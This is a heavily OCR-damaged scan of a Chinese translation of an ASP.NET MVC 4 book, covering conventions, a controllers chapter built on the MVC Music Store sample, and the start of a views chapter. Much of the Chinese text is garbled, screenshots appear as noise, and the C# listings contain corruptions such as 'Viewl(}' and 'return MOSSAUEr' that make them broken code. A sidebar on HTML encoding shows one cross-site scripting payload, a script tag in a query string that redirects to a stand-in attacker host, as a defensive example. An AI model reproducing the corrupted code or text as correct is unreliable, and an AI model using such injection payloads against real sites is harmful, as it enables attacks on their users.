到 目前 为 止 ， 您 已 经 知道 如 何 创 建 Web 应 用 程序 .。 现在 将 以 前 积累 的 经 验 应 用 于 框架 
中 ， 以 后 开发 就 没 必 要 再 配置 每 一 项 。 


通过 查看 应 用 程序 运行 的 三 个 核心 目录 ， 可 在 ASPNET MVC 中 看 到 这 一 概念 : 

® Controllers 

® Models 

® VIlews 

没 必 要 在 web.config 文件 中 设置 这 些 文件 夹 名 称 一 一 它们 约定 在 配置 文件 中 。 这 样 就 
避免 了 编辑 XML 文件 (如 web.config) 的 工作 。 例 如 ， 为 了 显 式 地 告诉 MVC 引擎 “可 以 在 
Views 目录 中 奉 找 程序 视图 ”一 一 这 些 程序 都 已 经 知道 ， 这 就 是 约定 。 


这 不 是 麻木。 实际 上 又 是 ; 但 它 不 是 墨 魔术 一 一 那 种 结 末 出 人 意料 的 魔术 (确实 可 以 伤 
害 到 目 己 )。 


ASPNET MVC 的 约定 非常 容易 理解 。 下 面 是 预期 的 程序 结构 : 

e 每 个 Controller 类 的 名 字 以 Controller 结尾 一 一 ProductController、HomeController 
等 ， 这 些 类 在 Controllers 目录 中 。 

e 应 用 程序 的 所 有 视图 放 在 一 个 单独 的 Views 目录 下 。 

e 控制 器 使 用 的 视图 是 在 Views 主 目 录 的 一 个 子 目 录 中 , 这 个 子 日 录 是 根据 控制 器 名 
称 ( 后 面 减 去 Controller 的 后 级 ) 来 命名 的 。 例 如 ， 前 面 讨论 的 ProductController 使 用 
的 视图 就 放 在 /Views/Product 目录 中 。 

所 有 可 重用 的 UI 元 素 都 位 于 一 个 相似 的 结构 中 ， 而 不 是 在 Views 文件 夹 的 一 个 共享 

目录 中 。 这 些 第 3 章 中 会 进行 详细 介绍 。 


2. 约定 简化 通信 


编写 代码 进行 通信 主要 面向 两 类 不 同 的 听众 : 

e 需要 将 清晰 的 无 二 义 性 的 指令 传递 给 计算 机 ， 让 它 来 执行 。 

e 需要 让 开发 人 员 读 懂 您 的 代码 ， 以 便 后 期 的 维护 、 调 试 以 及 完善 。 

前 面 已 经 讨论 了 约定 优 于 配置 如 何 高 效 地 将 您 的 想法 意图 传达 给 MVC。 约 定 也 能 帮 
助 您 清晰 地 与 其 他 开发 人 员 ( 包 括 以 后 的 自己) 进行 交流 。 不 必 详 细 地 描述 如 何 构建 应 用 程 
序 的 每 一 方面 ， 按 照 共同 的 约定 可 以 使 世界 上 所 有 的 ASPNET MVC 开发 人 员 公 用 一 个 共 
同 的 基准 线 (baseline)。 通常 情况 下 , 软件 设计 模式 的 优势 之 一 是 他 们 建立 了 一 种 标准 语言 。 
由 于 ASPNET MVC 采用 了 MVC 模式 及 一 些 独特 约定 ， 这 使 得 ASPNET MVC 开发 人 员 


26 


第 1 章 入 门 


能 够 很 轻松 地 理解 不 是 目 己 编写 的 代码 或 以 前 编写 但 现在 态 记 了 的 代码 ， 即 便 在 大 的 应 用 
程序 中 也 是 如 此 。 


1.4 小结 


章 涵盖 了 很 多 内 容 。 首 先 对 ASPNET MVC 进行 了 介绍 , 展示 了 ASPNET Web 框架 和 
MVC 软件 模式 如 何 结合 起 来 为 构建 Web 应 用 程序 提供 功能 强大 的 系统 。 回 顾 了 ASPNET 
MVC 经 由 三 个 版 本 发 展 成 熟 的 历程 ， 深 入 讲解 了 ASPNET MVC 4 的 特性 及 其 关注 点 。 根 
据 这 些 背 景 知识 ， 可 以 安装 、 设 置 开 发 环境 并 开始 创建 MVC 4 示例 应 用 程序 。 后 续 章 节 
将 更 加 详细 地 介绍 这 些 组 件 ， 下 面 将 从 第 2 章 的 控制 器 开始 。 
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本 章 主要 内 容 

e 控制 硕 的 角色 

e 控制 器 的 发 展 历 程 

e 示例 应 用 程序 : MVC Music Store 
e 控制 器 基础 


EF 章 力 述 控制 器 如 何 响 应 用 户 的 HTTP 请 求 并 将 处 理 的 信息 返回 给 浏览 器 ， 重 点 介绍 
控制 器 和 控制 器 操作 的 功能 。 由 于 到 目前 为 止 尚 未 涉及 视图 和 模型 ， 因 此 本 章 中 有 关 控制 
右 行 为 的 示例 会 有 些 超 前 。 不 过 本 章 内 容 为 接 下 来 几 章 的 学 习 现 定 了 基础 。 

第 1 章 首 先 概括 地 介绍 了 MVC 模式 ， 随 后 对 ASPNET MVC 和 ASPNET Web Forms 
进行 了 比较 。 接 下 来 开始 深入 地 介绍 MVC 模式 中 的 三 个 核心 元 素 之 一 一 一 控制 器 。 


2.1 控制 器 的 角色 


讨论 一 个 问题 最 好 的 方式 是 从 其 定义 开始 ， 然 后 再 深入 讨论 其 细节 。 在 阅读 本 章 时 ， 
牢记 控制 器 的 定义 ， 这 将 为 理解 控制 器 含义 及 其 应 用 打下 坚实 基础 。 

MVC 模式 中 的 控制 右 (Controllen 主要 负责 啊 应 用 户 的 输入 ， 并 且 在 啊 应 时 修改 模型 
(Model)。 通 过 这 种 方式 ，MVC 模式 中 的 控制 器 主要 关注 的 是 应 用 程序 流 、 输 入 数据 的 处 
理 ， 以 及 对 相关 视图 (View) 输 出 数据 的 提供 。 

过 去 的 Web 服务 器 文 持 访问 以 静态 文件 存储 在 磁盘 上 的 HIML 页 面 。 随 独 动 态 网 页 的 
盛行 ，Web 服务 器 也 文 持 由 存储 在 服务 器 上 的 动态 脚本 生成 的 HIML 页 面 。MVC 则 略 有 不 
同 。URL 首先 告知 路 由 机 制 (下 面 几 章 会 有 介绍 ， 在 第 9 章 会 进行 详细 介绍 ) 去 实例 化 哪个 
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控制 器 ， 调 用 哪个 操作 方法 ， 并 为 该 方法 提供 需要 的 参数 。 然 后 控制 句 的 方法 决定 使 用 哪 
个 视图 ， 并 对 该 视图 进行 演 染 。 

URL 并 不 与 存储 在 Web 服务 器 磁盘 上 的 文件 有 直接 对 应 关系 ， 而 是 与 控制 右 类 的 方 
法 有 关 。ASPNET MVC 对 MVC 模式 中 的 前 端 控 制 右 进行 了 改进 ， 正 如 后 耐 第 9 章 介 绍 的 ， 
路 由 子 系统 在 前 面 ， 之 后 才 是 控制 器 。 

理解 MVC 模式 在 Web 场景 中 工作 原理 的 便便 方法 就 是 记 住 ，MVC 提供 的 是 方法 调 
用 结果 ， 而 不 是 动态 生成 的 ( 义 名 脚本 ) 页 面 。 


控制 器 简 史 

MVC 已 经 出 现 了 很 长 一 段 时 间 一 一 可 以 追溯 到 现代 Web 应 用 程序 时 代 来 临 前 的 几 十 
年 。 当 MVC 第 一 次 开发 出 来 的 时 候 , 图 形 用 户 界 面 (GUD 才 刚刚 起 步 , 且 在 不 断 演化 发 展 。 
当时 ， 当 用 户 按 下 一 个 按键 或 单 击 屏幕 时 ， 某 个 进程 将 会 “监听 到 ”他 们 的 动作 ， 这 个 进 
程 就 是 控制 器 。 控 制 器 主要 负责 接收 和 解释 输入 ， 并 更 新 任何 需要 的 数据 类 (模型 )， 然 后 
通知 用 户 进行 的 修改 或 程序 更 新 (视图 ， 第 3 章 会 详细 介绍 )。 

20 世纪 70 年 代 末 和 80 年 代 初 ，Xerox PARC( 刚 好 也 是 MVC 模式 诞生 的 地 方 ) 的 研究 
员 开 始 研究 GUI 的 概念 ， 在 GUI 中 用 户 “ 工 作 ” 在 一 个 虚拟 的 “桌面 ”环境 中 ， 在 这 种 
环境 下 ， 用 户 可 以 单 击 和 来 回 拖 忠 条 目 。 从 这 里 产生 了 事件 驱动 编程 的 思想 一 一 根据 用 户 
触发 的 事件 (如 单 击 鼠 标 或 是 敲 击 键盘 上 的 按键 ) 来 执行 程序 操作 。 

后 来 ， 随 着 GUI 成 为 规范 ，MVC 模式 不 完全 适合 这 些 新 系统 ， 这 一 点 变 得 更 加 清晰 。 
在 此 类 系统 中 ， 由 GUI 组 件 负责 处 理 用 户 输入 ， 比 如 当 按 下 一 个 按钮 时 ， 是 该 按钮 本 身 响 
应 鼠标 单 击 ， 而 不 是 控制 器 。 按钮 转 而 将 依次 通知 所 有 单 击 的 观察 者 或 侦 听 者 它 被 单 击 了 。 
相对 于 MVC 模式 而 言 ， 男 一 些 模式 ， 如 模型 -视图 -表示 器 (Model-View-Presenter,， MVP) 
则 表现 的 与 这 些 现代 系统 更 相关 。 

ASPNET Web Forms 是 一 个 基于 事件 的 系统 ,这 在 Web 应 用 程序 平台 中 是 独一无二 的 。 
它 拥 有 一 个 强大 的 基于 控件 和 事件 驱动 的 编程 模型 , 从 而 为 开发 人 员 进 行 Web 开发 提供 了 
一 个 良好 的 组 件 化 GUI。 当 单 击 一 个 按钮 时 ，Button 控件 将 会 做 出 响应 ， 并 在 服务 器 端 引 
发 一 个 事件 以 告知 它 被 单 击 。 这 种 方法 的 妙 处 在 于 它 可 以 让 开发 人 员 在 更 高 的 抽象 级 别 下 
编写 代码 。 

然而 , 进行 更 深入 的 分 析 会 发 现 , 开展 的 很 多 工作 都 是 在 模拟 这 种 组 件 化 的 事件 驱动 。 
然而 本 质 上 ， 当 单 击 一 个 按钮 时 ， 浏 览 器 将 回 包 含 了 页 面 上 控件 状态 的 服务 器 提交 一 个 请 
求 ， 控 件 所 在 的 页 面 会 被 封装 在 一 个 编码 的 隐藏 输入 中 。 在 服务 器 端 ， 为 了 响应 该 请 求 ， 
ASPNET 必须 重建 整个 控件 层次 结构 ， 然 后 解释 请 求 ， 并 利用 请 求 的 内 容 来 恢复 应 用 程序 
中 用 户 的 当前 状态 。 究 其 本 质 ， 所 有 这 些 都 是 因为 Web 是 无 状态 的 。 因 此 ， 当 使 用 富 客 户 
端的 Windows GUI 应 用 程序 时 ， 没 必要 每 当 用 户 单 击 一 个 UI 小 部 件 时 就 重建 整个 屏幕 和 
控件 层次 结构 ， 因 为 应 用 程序 保持 了 原状 态 ， 不 曾 改 变 。 

对 于 Web 程序 而 言 ， 用 户 的 应 用 程序 状态 实质 上 是 消失 的 ， 只 不 过 是 后 来 用 户 每 次 单 
击 后 都 会 恢复 。 虽然 这 会 极 大 地 简化 程序 , 但 是 以 HTML 形式 出 现 的 用 户 界 面 需要 从 服务 
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器 发 送 到 客户 端 浏览 器 。 这 就 引发 一 个 问题 :“ 应 用 程序 在 哪里 ? ”， 对 于 大 多 数 Web 页 
面 而 言 ， 应 用 程序 就 在 客户 端 和 服务 器 之 间 “ 舞 蹈 ” 每 次 都 维持 一 个 小 状态 ， 可 能 是 客户 
辣 的 一 个 cookie 或 是 服务 器 上 的 一 块 内 存 , 一 切 都 被 小 心地 设计 来 掩盖 一 个 小 小 的 ”谎言 史 
这 个 “谎言 ”就 是 Internet 和 HTTP 可 以 进行 有 状态 的 编程 。 

当 进 行 Web 开发 时 ， 事 件 驱 动 编程 方法 ( 即 “状态 ”概念 ) 的 支撑 作用 将 不 复 存 在 ， 并 
且 许多 人 不 愿 接受 这 个 虚拟 有 状态 平台 的 谎言 。 鉴 于 此 ， 业 界 已 经 见证 了 MVC 模式 的 复 
兴 ( 尽 管 对 其 做 了 一 点 轻微 的 改动 )。 

下 面 给 出 一 个 改动 的 示例 。 在 传统 的 MVC 模式 中 ， 模 型 可 以 通过 与 视图 的 间接 联系 
来 “观察 ”视图 ， 这 就 允许 模型 根据 视图 的 事件 来 进行 自我 调整 。 对 于 在 Web 开发 中 应 用 
MVC 模式 而 言 ， 当 视图 被 发 送 到 客户 端 浏览 器 时 ， 模 型 通常 已 经 不 在 内 存 当中 ， 所 以 就 
不 再 能 观察 视图 上 的 事件 (注意 ， 当 第 8 章 中 讨论 将 Ajax 运用 到 MVC 中 时 ， 将 看 到 这 一 
改动 的 例外 情况 )。 

在 Web 开发 中 采用 MVC 模式 ， 控 制 器 再 次 走 在 了 前 列 。 应 用 MVC 模式 要 求 Web 应 
用 程序 中 的 每 一 个 用 户 输入 只 采用 请 求 的 方式 。 例 如 ， 在 ASPNET MVC 中 ， 每 个 请 求 都 
被 路 由 (路 由 使 用 将 在 第 9 章 中 介绍 ) 到 控制 器 的 一 个 方法 (又 称 操作 ), 该 控制 器 全 权 负 责 解 
释 这 些 请 求 ， 如 有 必要 ， 还 要 操纵 模型 ， 然 后 选择 一 个 视图 反馈 给 用 户 。 


上 面 学 习 了 一 部 分 理论 知识 ， 接 下 来 深入 讲解 ASPNET MVC 控制 器 的 具体 实现 。 我 
们 将 继续 使 用 第 1 章 创建 的 项 目 。 如 果 跳 过 了 第 1 章 中 新 项 目的 创建 ， 请 参照 上 一 章 中 的 
步骤 ,使 用 Internet Application 模板 和 Razor 视图 引擎 创建 一 个 新 的 ASPNETMVC 4 应 用 
程序 ， 最 终结 果 如 图 1-9 所 示 。 


2.2 示例 应 用 程序 : MVC Music Store 


正如 第 1 章 中 提 到 的 , 本 书 中 的 很 多 示例 程序 都 是 采用 的 MVC Music Store。 有 关 MVC 
Music Store 应 用 程序 的 更 多 信息 ， 请 查阅 http://mvecmusicstore.codeplex.com。 这 个 MVC 
Music Store 教程 专 为 初学 者 设计 ， 讲 解 进度 很 慢 ， 这 是 专业 系列 从 书 中 的 一 本 ， 进 度 会 比 
较 快 ， 并 且 还 会 阐述 一 些 比 较 高 级 的 背景 细节 。 因 此 ， 如 果 您 希望 简单 较 慢 地 学 习 这 些 内 
容 , 请 参考 MVC Music Store 教程 。 这 个 教程 可 以 在 线 以 HTML 格式 查阅 , 也 可 以 下 载 150 
页 的 PDF 文件 。MVWC Music Store 以 Creative Commons 许可 的 方式 发 布 ， 这 样 可 以 自由 重 
用 ， 本 书 有 时 将 引用 该 程序 。 

MVC Mnusic Store 应 用 程序 是 一 个 简单 的 音乐 商店 ， 其 中 包括 基本 的 购物 、 结 账 和 管 
理 功能 ， 如 图 2-1 所 示 。 

该 音乐 商店 涵 羡 以 下 特征 : 

e 浏览 : 根据 流派 和 艺术 家 浏览 音乐 ， 如 图 2-2 所 示 。 

e 添加 : 问 购 物 车 中 添加 音乐 ， 如 图 2-3 所 示 。 
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。 购物 ， 更 新 购物 车 (采用 Ajax 更 新 )， 如 图 2-4 所 示 。 


Home Store Cart (3) | Admin 


ASP.NET MVC MUSIC STORE 
Rock Review your cart: 
EF, 

Metal Checkout >> 
Alternative 

[Msco 

Blues 


Latin 


Pachelbel: Canon Kk GIgue 日 .99 


Kegsae 
Pap 
Classical 


图 2-4 


。 订单 ， 生 成 一 个 订单 并 且 结账 注销 登录 ， 如 图 2-5 所 示 。 


Rock 

Jarr 

Metal 
Alternative 
[Nisco 
Rlues 
Latin 
ReRgRae 


区 Pp 


Classical 


i123) 456-7890 


Ilestihtedt com 


图 2-5 
e 管理 : 编辑 歌曲 列表 ( 仅 限 管理 员 )， 如 图 2-6 所 示 。 


Create Neiw 


Classical Aarcon Copland & London Sy A Copland Celebration wo $8.99 Edit | Details | Delete 
Aaron Goldberg Worlds $8.99 Edit | Details | Delete 

AGIDG For Those About To ROCK W... $8.99 Edit | Detalls | Delete 

Rock ACIDC Let There Be Rock $8.99 Edit | Details | Delete 
Restiess and Wild $8.99 Edit | Details | Delete 

Classical Adrian Leaper & Doreen de... Ggrecki: Symphony No.3 $8.99 Edit | Details | Delete 


图 2-6 


2.3 控制 器 基础 


在 MVC 入 门 时 会 过 到 像 先 有 鸡 还 是 先 有 和 集 这 样 的 问题 ， 需要 理解 三 个 部 分 (模型 、 视 
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图 和 控制 项 )， 但 在 不 理解 其 他 部 分 的 情况 下 ， 要 深入 了 解 其 中 一 个 部 分 是 很 难 的 。 因 此 ， 
在 开始 学 习 MVC 时 ， 需 要 首先 概括 性 地 了 解 控制 器 ， 和 暂时 先 不 管 模型 和 视图 。 

讲解 了 控制 器 的 基本 工作 原理 之 后 ， 我 们 将 准备 深入 地 讲解 视图 、 模 型 和 其 他 
ASPNET MVC 开发 主题 。 然 后 在 第 15 章 册 回 过 头 来 讲解 高 级 控制 硕 。 


2.3.1 简单 示例 : Home Controller 


在 开始 实质 性 地 编写 代码 之 前 ， 首 先 了 解 一 下 在 一 个 新 的 项 目 中 默认 都 包含 哪些 内 容 。 

用 Internet Application 模板 创建 的 项 目 包 含 两 个 控制 器 类 : 

e HomeController: 负责 网 站 根 日 录 下 的 “home page”、“about page” 和 “contact page”。 

e AccountController: 啊 应 与 账户 相关 的 请 求 ， 比 如 登录 和 账户 注册 。 

在 Visual Studio 的 项 目 中 ， 展 开 /Controller 文件 来， 打开 HomeController.cs 文件 ， 如 
图 2-7 所 示 。 


B= 日 x 
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Using Systenm; er rp Pe 
using System.Collec ions ,Generiec: a a 
LE Syatem.,L1nd: a usore 
Sin Syatenm ,Web: Bb | EE Proprrir 
UsinE System,Web .Mye: 站 
国 Mes Dels 
nanmespace MyeMusicstore, Controllers bl App Mt 
i 国 Contenl 
EC centralber. 
publie elass Hometcontraller : Controller Es a 
I b El meet Eagle 
Publie ActionResult Lndext) bs 国 Filter 
bk mag 
ViewBae. Message = "Molify this template to jump-start your ASP .NE bh il Mod 
bp ml ript 
E 区 [ ER 
return Viewl(}; BB lieonike 
} hb ebaliei 
Eel on 
public ActionResult About() b Dl Web.config 


ViewBap.Messape = “Tour app description pape.”™: 


return Vuewl); 


| 
publie ActienResult Contoactt) 
ViewBape. Messape sa Tour contactk pape. s 


return View(); 


图 2-7 


注意 这 是 一 个 相当 简单 的 类 ， 它 继承 Controller 基 类 。HomeController 类 的 Index 方 
法 负责 决定 当 浏 览 网 站 首页 时 触发 的 事件 。 下 面 按照 以 下 步骤 对 程序 进行 简单 的 修改 ， 然 
后 运行 程序 。 

(1) 用 自己 想 要 的 短语 替换 Index 方法 中 的 “Welcome to ASPNET MVC!”, 比如 “I like 
cakel! 。 


USing System; 
USiNng SYystem.Collections.Generic; 
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Uslng System.Ling; 
USing System.Web; 
Uslng SYystem.Web.Myvc; 


namespace MycMusicSstore.controllers 


{ 
public class HomeController : Controller 
{ 
Public ActionResult Index() 
{ 
ViewBag.Message = "I like cakel!™".: 
return Viewl(}); 
} 
public ActionResult About () 
{ 
ViewBag.Message = “YOUT app description page.} 
return View!(); 
} 
public ActionResult Contact () 
{ 
ViewBag.Message = "Your contact page.™i 
return View(); 
} 
} 
} 


(2) 按 下 FS 键 或 者 使 用 Debug | Start Debugging 菜单 项 运行 程序 。Visual Studio 编译 应 
用 程序 并 启动 运行 在 IIS Express 下 的 站 点 。 


IIS Express 和 ASP.NET 开发 服务 器 


”Visual Studio 2012 包括 HS Express， 这 是 TIS 的 本 地 开发 版 本 ， 可 以 用 来 在 一 个 随机 


的 空闲 端口 上 运行 网 站 。 在 图 2-8 中 ， 网 站 在 http://localhost:26641/ 上 运行 ， 因 此 它 采 用 的 
端口 号 是 26641, 您 运行 时 的 端口 号 可 能 与 这 个 不 同 。 本 书 讨论 的 URL( 比 如 /Store/Browse) 
会 跟 在 端口 号 后 面 。 假 设 疹 口 号 是 26641， 那 么 浏览 /Store/Browse 将 意味 痢 是 浏览 
http://localhost:26641/Store/Browse. 

Visual Studio 2010 及 其 以 下 版 本 使 用 的 是 Visual Studio Development Server( 有 时 也 称 
它 的 老 代 号 Cassin)， 而 不 是 IIS Express。 尺 管 Development Server 很 像 IS， 但 IIS 7.5 Express 
实际 上 是 IS 的 优化 版 本 ， 优 化 后 使 它 更 适用 于 开发 。 想 更 多 地 了 解 HIS 7.5 Express， 请 查 
阅 Scott Guthrie 的 博客 http://weblogs.asp.net/scotteu/7673719.aspx。 

如 果 使 用 的 Visual Studio 2010 SP1， 选 择 使 用 IIS 7.5 Express 代替 Development Server 
会 变 得 非常 容易 。 我 们 可 以 在 Project 属性 的 Web 选项 卡 中 ， 通 过 选择 Use Local IIS Web 
Server 或 Use Visual Studio Development Server 来 修改 项 目的 Web 服务器， 如 图 2-8 所 示 。 
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图 2-8 


Home About Contact 


We suggest the following: 


Getting Started 

人 ASP.NET MYC ives You a powertul, pattems-based way to build dynamic websites that enables a clean separation of CONcems and that 
gives you full control over markup for enjoyable, agile development. ASP.NET MVC includes many features that enable fast, TDO- 
friendiy devalopment for creating sophisticated applications that use the Latest veb standards. Leam more 


NuGet makes it easy to inatall and Update free libraries and tools. Leam mort 


Find Web Hosting 
You can easily find a web hosting company that olfers the right mix of features and price for your applications. Leam more 


图 2-9 
现在 已 经 创建 了 一 个 新 项 目 并 在 屏幕 上 显示 了 一 些 短语 ， 接 下 来 通过 创建 一 个 新 的 控 
制 右 来 创建 一 个 实际 的 应 用 程序 。 
2.3.2 创建 第 一 个 控制 器 


首先 创建 一 个 控制 堪 来 处 理 有 关 浏览 音乐 目录 的 URL。 这 个 控制 费 文 持 以 下 三 个 功能 : 
e 索引 页 面 列 出 商店 里 包含 的 音乐 类 型 。 
e。 单 击 一 个 流派 ， 跳 转 到 一 个 列 出 该 流派 下 所 有 音乐 专辑 的 页 面 。 
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。 单 击 一 个 专辑 ， 跳 转 到 一 个 列 出 有 关 该 专辑 所 有 信息 的 页 面 。 
1. 创建 新 控制 器 


首先 添加 一 个 新 的 StoreController 类 。 右 击 Solution Explorer 下 的 Controllers 文件 夹 ， 
选择 Add | Controller 菜单 项 ， 如 图 2-10 所 示 。 


ME 
earch Salution Erplerer (Cte:) Pp: 
BB] solution ‘MereNlusicThors’ 2 projects) 
4a EF) MveMusicStore 
b ps Properie 
hb sm elerervee 
i App_Dats 
hb Mp Qt 
b Bl Content 


Ei] Vip in Browyse (ntemat Explorer) fts Shafte WW bp ce ccountConbieller cr 
Brovwse Wh, hb Cs Hormel ontroler.cs 
Comeprt to Web Applicatron 


将 控制 器 命名 为 StoreController， 将 Template 修改 为 Empty MVC controller， 如 图 2-11 
所 示 。 


| Controller name 

| controller 
scaffolding options 
Template: 


[Empty MYC controlier 


2. 编写 操作 方法 


新 创建 的 StoreController 控制 器 已 经 有 了 一 个 Index 方法 ,下 面 将 利用 这 个 方法 实现 在 
页 面 上 列 出 音乐 商店 里 所 有 歌曲 流派 的 功能 。 另 外 ， 还 需要 添加 两 个 额外 的 方法 来 实现 上 
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述 其 他 两 项 功能 ， 这 两 个 方法 分 别 是 Browse 和 Details。 

控制 器 里 的 这 些 方法 (Index、Browse 和 Details) 称 为 控制 器 操作 。 正 如 上 述 的 Home- 
Controller.Index0 〇 操作 方法 那样 ， 控 制 右 操作 的 工作 是 啊 应 URL 请 求 ， 执 行 正 确 的 操作 ， 
并 同 浏 览 器 或 是 单 击 这 个 URL 的 用 户 做 出 啊 应 。 

要 了 解 控制 器 操作 的 工作 原理 ， 可 按照 以 下 步骤 操作 : 

(1) 将 Index0 方 法 的 签名 改 为 string( 而 不 是 ActionResult)， 然 后 将 返回 值 改 为 “Hello 
from Store.Index()”， 如 下 所 示 : 


// 
/7GET: /Storel 
public string Index () 
L 
return " Hello from Store.Index()" ，; 


} 


(2) 添加 对 商店 的 Browse 操作 方法 , 将 返回 值 设 为 “Hello from Store.Browse0 7”: 添加 
Details 操作 方法 ， 将 返回 值 设 为 “Hello from Store.DetailsO ”。 控 制 右 StoreController 的 完 
整 代码 如 下 所 示 : 


using 
using 
Using 
USing 
usSing 


SYStLemz 
System.Collections.Generic; 
SYStem-LlIndG， 

System.Web; 

System.Web.Mvc; 


namespace MycMusicSstore.controllers 


{ 


public class StoreController : Controller 


L 


/1 
// GET: /Store/ 
public string Index () 
{ 
return "Hello from Store.Index()": 
} 
i/ 
// GET: /Store/Browse 
Public string Browse() 
{ 
return "Hello from Store.Browse()"; 
} 
/1 
// GET: /Store/Details 
Public string Detaills  () 
{ 
return "Hello from Store.Details()":; 


} 
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} 
} 
(3) 重新 运行 项 目 ， 然 后 浏览 以 下 URL: 


® /Store 


@ /Store/Browse 
® /Store/Detaills 


图 2-12 
3. 经 验 总 络 


从 以 上 这 个 简单 实验 中 可 以 得 出 以 下 几 个 结论 : 

e 不 需要 做 任何 额外 配置 ， 浏 览 到 /Store/Details 就 可 以 执行 StoreController 类 中 的 
Details 方法 ， 这 就 是 操作 中 的 路 由 。 本 章 后 面 还 会 对 路 由 稍 做 介绍 ， 第 9 章 将 对 此 
进行 详细 介绍 。 

e 尽管 是 使 用 Visual Studio 工具 来 创建 这 个 控制 器 类 ,但 它 的 确 是 一 个 非常 简单 的 类 。 
判别 一 个 类 是 否 是 控制 器 类 的 唯一 方式 ， 束 是 得 看 该 类 是 否 继承 目 System.Web. 
Mvc.Controller 。 

e 已 经 利用 一 个 控制 器 在 浏览 句 里 显示 了 文本 一 一 没有 用 到 模型 和 视图 。 尽 管 在 
ASPNET MVC 中 模型 和 视图 非常 有 用 ， 但 控制 器 才 是 真正 的 核心 。 每 一 个 请 求 都 
必须 通过 控制 右 处 理 ， 然 而 其 中 有 些 请 求 是 不 需要 模型 和 视图 的 。 


2.3.3 “控制 器 操作 中 的 参数 


前 面 的 例子 写 出 的 是 常量 字符 串 。 下 一 步 就 是 让 它们 通过 响应 URL 传 进来 的 参数 动态 
地 执行 操作 。 按 以 下 步骤 来 实现 ; 

(1) 把 Browse 操作 方法 修改 为 ， 检 索 从 URL 传 过 来 的 查询 字符 串 值 。 可 以 通过 在 操 
作 方 法 中 添加 一 个 string 类 型 的 “genre” 参 数 来 实现 这 个 功能 。 然 后 ， 当 这 个 方法 被 调用 
时 ，ASPNET MVC 会 自动 将 名 为 “genre” 的 查询 字符 串 或 表单 提交 参数 传递 给 Browse 
操作 方法 。 

Fy 


// GET: /Store/Browse?genre=?Disco 
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public string Browse (string genre) 
{ 
string message = 
HttpUtility.HtmlEncode ("Store.Browse, Genre = ”二 genre);}; 


return messager 


} 


HTML 编码 的 用 户 输 入 

利用 方法 HttpUtility.HtmlEncode 来 预 处 理 用 户 输入 。 这 样 就 能 阻止 用 户 用 链接 向 视图 
中 注入 JavaScript 代码 或 HTML 标记 ， 比 如 /Store/Browse?Genre=<script>window.location= 
'http://hacker.example.com'</script>。 

(2) 浏览 到 /Store/Browse?Genre=Disco， 结 果 如 图 2-13 所 示 。 


本 古诗 二 ee— 


'€ BS http-/ /localhost.26641/5tore/BrowselGenn P= 已 其 || localhon 


Store.Browse. Genre = Disco 


2-13 


这 表明 控制 器 操作 可 将 得 询 字 符 串 作为 其 操作 方法 的 参数 来 接收 。 

(3) 修改 Details 操作 方法 ， 使 其 读 取 和 显示 一 个 名 为 ID 的 输入 参数 。 这 里 不 像 前 
面 的 方法 那样 把 ID 值 作为 一 个 查询 字符 串 参 数 ， 而 是 将 ID 值 直接 峙 入 到 URL 中 ， 如 
/store/Deatlla/5 。 

ASPNET MVC 在 不 再 要 任何 额外 配置 的 情况 下 可 以 很 容易 地 做 到 这 一 点 。ASPNET 
MVC 的 默认 路 由 约定 ， 就 是 将 操作 方法 名 称 后 面 URL 的 这 个 片段 作为 一 个 参数 ， 该 参数 
的 名 称 为 JP。 如 果 操 作 方 法 中 有 名 为 ID 的 参数 ， 那 么 ASPNET MVC 会 目 动 将 这 个 URL 
片段 作为 参数 传递 过 来 。 

/7/ 

// GET: /Store/Details/5 

public string Detaills (int id) 

{ 


string message = "Store.Details, ID= ”二 id; 


return MOSSAUEr 


} 


(4) 运行 应 用 程序 ， 浏 览 到 /Store/Details/5， 结 果 如 图 2-14 所 示 。 


第 2 章 控制 器 


7 | 四 入 
=O | 
| ad. 


1 htip Mocalhost D6641 /Sore De 


Store.Details, ID= 5 


图 2-14 


像 前 面 示例 演示 的 那样 , 控制 器 操作 感觉 就 像 是 Web 浏览 器 直接 调用 控制 器 类 中 的 方 
法 。 类 、 方 法 和 参数 都 被 具体 化 为 URL 中 的 特定 路 径 片段 或 查询 字符 串 ， 结 果 就 是 一 个 返 
回 给 浏览 器 的 字符 串 。 这 就 进行 了 极 大 的 人 简化， 而 急 略 了 下 面 这 些 细节 : 

e 路 由 将 URL 映射 到 操作 的 方式 。 

e 将 视图 作为 模板 生成 返回 给 浏览 器 的 字符 串 ( 通 常 是 HTML 格式 )。 

e 操作 很 少 返 回 原 始 的 字符 串 ; 它 通 常 返 回合 适 的 ActionResult 来 处 理 像 HTTP 状态 

码 和 调用 视图 模板 系统 这 样 的 事项 。 

控制 器 提供 了 很 多 自 定义 和 扩展 的 功能 ， 但 是 我 们 很 少 能 用 到 这 些 内 容 。 在 一 般 应 用 
中 ， 控 制 器 通过 URL 被 调用 ， 然 后 执行 自 定 义 的 代码 并 返回 一 个 视图 。 先 记 住 这 些 内 容 ， 
后 面 我 们 会 详 述 关于 控制 器 如 何 定 义 、 调 用 和 扩展 的 底层 细节 ， 这 些 底层 内 容 以 及 其 他 高 
级 主题 将 在 第 15 章 中 进行 讲解 。 现 在 已 经 很 好 地 学 习 了 控制 器 如 何 与 视图 结合 的 基本 知 
识 ， 第 3 章 中 会 对 这 部 分 内 容 进 行 详细 介绍 。 


2.4 小结 


控制 器 是 MVC 应 用 程序 的 “指挥 员 ”， 它 精心 紧密 地 编排 用 户 、 模 型 对 象 和 视图 的 交 
互 。 同 时 控制 器 还 负责 响应 用 户 输 入 ， 操 纵 正 确 的 模型 对 象 ， 然 后 选择 合适 的 视图 显示 给 
用 户 以 作为 对 用 户 最 初 输入 的 啊 应 。 

本 章 讲解 了 控制 器 独立 于 视图 和 模型 工作 的 基本 原理 ， 讲 解 了 应 用 程序 如 何 执行 代码 
来 响应 URL 请 求 ， 这 些 都 是 处 理 用 户 界面 的 必 备 知识 。 接 下 来 的 第 3 章 将 介绍 视图 的 相 
关内 容 。 


A1 


本 章 主 要 内 容 

e 视图 的 作用 
e 指定 视图 

e 强 类 型 视图 
e 理解 视图 模型 
e 如 何 浴 加 视图 
e Razor 的 用 法 
e 指定 部 分 视角 


开发 人 员 之 所 以 花费 大 量 时 间 来 重点 设计 控制 器 和 模型 对 象 ， 是 因为 在 这 些 领域 中 ， 
精心 编写 的 整洁 代码 是 开发 一 个 可 维护 Web 应 用 程序 的 基础 。 

但 是 当 用 户 在 浏览 器 中 访问 Web 应 用 程序 时 ， 这些 工作 他 们 是 看 不 到 的 。 用户 对 应 用 
程序 的 第 一 印象 ， 以 及 与 应 用 程序 的 整个 交互 过 程 都 是 从 视图 开始 的 。 

